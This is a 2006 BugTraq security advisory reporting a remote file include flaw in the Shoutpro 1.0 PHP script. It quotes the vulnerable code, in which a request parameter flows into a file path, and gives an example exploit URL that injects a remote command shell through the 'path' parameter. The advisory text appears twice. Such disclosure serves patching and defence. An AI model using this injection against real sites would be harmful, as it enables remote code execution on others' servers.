BugTraq
Back to list
|
Post reply
Shoutpro 1.0 Version - Remote File Include Vulnerability
Jun 13 2006 05:39PM
SpC-x Bsdmail Org
# SaVSaK.CoM | SpC-x - The_BeKiR |
# Shoutpro 1.0 Version - Remote File Include Vulnerability
# Risk : High
# Class: Remote
# Script : Shoutpro
# Credits : SpC-x
# Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx
# Code :
# include("config.php");
# include("functions.php");
# if ($path){
# $ips = file("$path/lists/bannedips.php");
# } else {
# $ips = file("lists/bannedips.php");
# }
# if (in_array($REMOTE_ADDR,$ips)) {
# echo($bannedmessage);
# die;
# }
# Vulnerable :
# http://www.victim.com/Shoutpro/include.php?path=Command-Shell
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
# Shoutpro 1.0 Version - Remote File Include Vulnerability
# Risk : High
# Class: Remote
# Script : Shoutpro
# Credits : SpC-x
# Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx
# Code :
# include("config.php");
# include("functions.php");
# if ($path){
# $ips = file("$path/lists/bannedips.php");
# } else {
# $ips = file("lists/bannedips.php");
# }
# if (in_array($REMOTE_ADDR,$ips)) {
# echo($bannedmessage);
# die;
# }
# Vulnerable :
# http://www.victim.com/Shoutpro/include.php?path=Command-Shell
[ reply ]